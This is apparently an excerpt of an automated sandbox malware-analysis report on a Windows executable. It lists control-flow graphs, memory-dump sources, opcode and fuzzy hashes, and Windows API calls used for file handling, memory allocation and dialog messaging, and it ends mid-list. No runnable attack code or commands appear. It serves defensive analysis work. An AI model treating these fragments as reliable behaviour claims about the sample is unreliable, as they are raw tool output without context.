                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                        • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                        • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                        • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 792 407ac3-407ac7 793 407ac9-407bba 792->793 794 407ade-407ae4 792->794 804 407be7-407beb 793->804 796 407aeb-407aff 794->796 797 407b01-407b17 796->797 798 407b19-407b2c 796->798 801 407b33-407b3a 797->801 798->801 802 407b61-407b64 801->802 803 407b3c-407b40 801->803 807 407c65-407c68 802->807 805 407b46-407b5e 803->805 806 407ccd-407cd4 803->806 808 407c4a-407c5d 804->808 809 407bed-407c0c 804->809 805->802 810 407cdd-407cea 806->810 816 407350 807->816 817 407cec 807->817 808->807 812 407c25-407c39 809->812 813 407c0e-407c23 809->813 815 407cef-407cf6 810->815 814 407c3c-407c43 812->814 813->814 823 407be1-407be4 814->823 824 407c45 814->824 818 407357-40735b 816->818 819 40749b-4074b6 816->819 820 40746d-407471 816->820 821 4073ff-407403 816->821 817->815 818->810 825 407361-40736e 818->825 819->796 826 407c76-407c7d 820->826 827 407477-40748b 820->827 829 407409-407420 821->829 830 407c6d-407c74 821->830 823->804 831 407cd6 824->831 832 407bc6-407bde 824->832 825->817 833 407374-4073ba 825->833 826->810 834 40748e-407496 827->834 835 407423-407427 829->835 830->810 831->810 832->823 837 4073e2-4073e4 833->837 838 4073bc-4073c0 833->838 834->820 839 407498 834->839 835->821 836 407429-40742f 835->836 840 407431-407438 836->840 841 407459-40746b 836->841 844 4073f5-4073fd 837->844 845 4073e6-4073f3 837->845 842 4073c2-4073c5 GlobalFree 838->842 843 4073cb-4073d9 GlobalAlloc 838->843 839->819 846 407443-407453 GlobalAlloc 840->846 847 40743a-40743d GlobalFree 840->847 841->834 842->843 843->817 848 4073df 843->848 844->835 845->844 845->845 846->817 846->841 847->846 848->837
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                        • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                        • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                        • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 849 407312-407330 850 407332-407335 849->850 851 40733a-407341 849->851 852 407cf0-407cf6 850->852 853 407344-40734a 851->853 854 407350 853->854 855 407cec 853->855 856 407357-40735b 854->856 857 40749b-407aff 854->857 858 40746d-407471 854->858 859 4073ff-407403 854->859 860 407cef 855->860 861 407361-40736e 856->861 862 407cdd-407cea 856->862 870 407b01-407b17 857->870 871 407b19-407b2c 857->871 863 407c76-407c7d 858->863 864 407477-40748b 858->864 866 407409-407420 859->866 867 407c6d-407c74 859->867 860->852 861->855 868 407374-4073ba 861->868 862->860 863->862 869 40748e-407496 864->869 872 407423-407427 866->872 867->862 874 4073e2-4073e4 868->874 875 4073bc-4073c0 868->875 869->858 876 407498 869->876 877 407b33-407b3a 870->877 871->877 872->859 873 407429-40742f 872->873 880 407431-407438 873->880 881 407459-40746b 873->881 884 4073f5-4073fd 874->884 885 4073e6-4073f3 874->885 882 4073c2-4073c5 GlobalFree 875->882 883 4073cb-4073d9 GlobalAlloc 875->883 876->857 878 407b61-407c68 877->878 879 407b3c-407b40 877->879 878->853 886 407b46-407b5e 879->886 887 407ccd-407cd4 879->887 888 407443-407453 GlobalAlloc 880->888 889 40743a-40743d GlobalFree 880->889 881->869 882->883 883->855 891 4073df 883->891 884->872 885->884 885->885 886->878 887->862 888->855 888->881 889->888 891->874
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                        • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                        • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                        • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                        • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                        • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                        • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                        • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                        • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                        • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                        • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                        • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                        • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                        APIs
                                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree
                                                        • String ID:
                                                        • API String ID: 3394109436-0
                                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                        APIs
                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                        • String ID:
                                                        • API String ID: 4115351271-0
                                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                        • GetClientRect.USER32(?,?), ref: 00405196
                                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
